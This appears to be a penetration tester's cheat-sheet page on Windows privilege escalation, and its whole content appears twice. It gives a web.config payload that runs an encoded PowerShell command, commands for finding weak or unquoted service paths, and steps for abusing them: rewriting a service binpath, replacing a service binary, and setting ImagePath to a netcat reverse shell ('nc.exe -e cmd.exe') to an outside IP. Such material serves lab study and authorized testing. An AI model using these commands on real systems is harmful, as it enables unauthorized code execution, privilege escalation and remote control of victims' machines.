Privilege Escalation

PreviousWindows Persistence NextTrust Enumeration and Attacks

Last updated 2 months ago

Privilege Escalation

Web.config RCE

If you are able to edit or manipulate the file you can use it to Remote Command Execution

Vulnlab:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="powershell" arguments="-e <Base64String>" hostingModel="OutOfProcess" />
    </system.webServer>
  </location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->

Unquoted Service Path


#Audit weak service permission with SharpUp
PS C:\htb> .\SharpUp.exe audit

#Searching for weak service ACLs in the Windows Registry (It is also worth searching for weak service ACLs in the Windows Registry. )
C:\htb> accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services

#Manual Checks
Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName | fl
#Check File or Directory Permissions
Get-ACL -Path 'C:\Program Files (x86)\IObit' | fl
#Check Service Permission
Get-CimInstance -ClassName Win32_Service -Filter "Name = 'IObitUnSvr'" | Select-Object *

#Abuse
Write-ServiceBinary -Name IObitUnSvr -Path "C:\Program Files (x86)\IObit\IObit.exe" -Command "" | fl

#Interact with service
Stop-Service -Name 'IObitUnSvr'
Start-Service -Name 'IObitUnSvr'
Restart-Service -Name 'IObitUnSvr'
C:\htb> sc start <ServiceName>
C:\htb> sc stop <ServiceName>
C:\htb> sc query <ServiceName>

#Shutdown machine
shutdown -r -t 0

#Modify service binpath
C:\htb> sc config <ServiceName> binpath="COMMAND-HERE"

#Modify ImagePath
PS C:\htb> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"

#Replacing Service Binary example
C:\htb> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"

PreviousWindows Persistence NextTrust Enumeration and Attacks

Last updated 2 months ago

Web.config RCE

If you are able to edit or manipulate the file you can use it to Remote Command Execution

Vulnlab:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="powershell" arguments="-e <Base64String>" hostingModel="OutOfProcess" />
    </system.webServer>
  </location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->

Unquoted Service Path


#Audit weak service permission with SharpUp
PS C:\htb> .\SharpUp.exe audit

#Searching for weak service ACLs in the Windows Registry (It is also worth searching for weak service ACLs in the Windows Registry. )
C:\htb> accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services

#Manual Checks
Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName | fl
#Check File or Directory Permissions
Get-ACL -Path 'C:\Program Files (x86)\IObit' | fl
#Check Service Permission
Get-CimInstance -ClassName Win32_Service -Filter "Name = 'IObitUnSvr'" | Select-Object *

#Abuse
Write-ServiceBinary -Name IObitUnSvr -Path "C:\Program Files (x86)\IObit\IObit.exe" -Command "" | fl

#Interact with service
Stop-Service -Name 'IObitUnSvr'
Start-Service -Name 'IObitUnSvr'
Restart-Service -Name 'IObitUnSvr'
C:\htb> sc start <ServiceName>
C:\htb> sc stop <ServiceName>
C:\htb> sc query <ServiceName>

#Shutdown machine
shutdown -r -t 0

#Modify service binpath
C:\htb> sc config <ServiceName> binpath="COMMAND-HERE"

#Modify ImagePath
PS C:\htb> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"

#Replacing Service Binary example
C:\htb> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"